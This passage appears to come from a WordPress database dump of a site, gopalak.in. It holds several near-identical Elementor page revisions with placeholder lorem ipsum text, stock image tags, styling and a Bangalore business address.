loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:34:33','2022-09-30 06:04:33','',1373,'https://gopalak.in/?p=1459',0,'revision','',0),(1460,1,'2022-09-30 11:34:33','2022-09-30 06:04:33','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:34:33','2022-09-30 06:04:33','',1373,'https://gopalak.in/?p=1460',0,'revision','',0),(1461,1,'2022-09-30 11:35:00','2022-09-30 06:05:00','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:35:00','2022-09-30 06:05:00','',1373,'https://gopalak.in/?p=1461',0,'revision','',0),(1462,1,'2022-09-30 11:35:00','2022-09-30 06:05:00','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:35:00','2022-09-30 06:05:00','',1373,'https://gopalak.in/?p=1462',0,'revision','',0),(1463,1,'2022-09-30 11:35:00','2022-09-30 06:05:00','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor 